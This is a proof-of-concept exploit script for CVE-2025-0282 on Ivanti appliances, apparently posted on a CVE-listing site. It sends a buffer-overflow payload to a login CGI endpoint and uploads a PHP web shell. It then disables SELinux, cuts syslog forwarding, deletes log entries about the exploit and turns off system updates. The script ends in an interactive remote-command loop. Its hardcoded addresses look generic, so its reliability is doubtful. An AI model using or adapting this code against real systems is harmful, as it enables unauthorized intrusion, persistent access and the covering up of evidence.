4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-0282
README.md
Rendering markdown...
POC / CVE_2025_0282_Ivanti.py PY
⬇ Raw GitHub ✕ Close 
import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_selinux(target_ip):
    command = "setenforce 0"
    execute_shell_command(target_ip, command)
    print("[+] SELinux disabled.")

def prevent_syslog_forwarding(target_ip):
    command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
    execute_shell_command(target_ip, command)
    command = "systemctl restart rsyslog"
    execute_shell_command(target_ip, command)
    print("[+] Syslog forwarding disabled.")

def remount_drive_rw(target_ip):
    command = "mount -o remount,rw /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-write.")

def remove_log_entries(target_ip):
    command = "sed -i '/CVE-2025-0282/d' /var/log/*"
    execute_shell_command(target_ip, command)
    print("[+] Log entries related to the exploit removed.")

def enable_selinux(target_ip):
    command = "setenforce 1"
    execute_shell_command(target_ip, command)
    print("[+] SELinux re-enabled.")

def remount_drive_ro(target_ip):
    command = "mount -o remount,ro /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-only.")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")

def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    upload_web_shell(target_ip, local_shell_path)

    disable_selinux(target_ip)
    prevent_syslog_forwarding(target_ip)
    remount_drive_rw(target_ip)
    remove_log_entries(target_ip)
    enable_selinux(target_ip)
    remount_drive_ro(target_ip)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()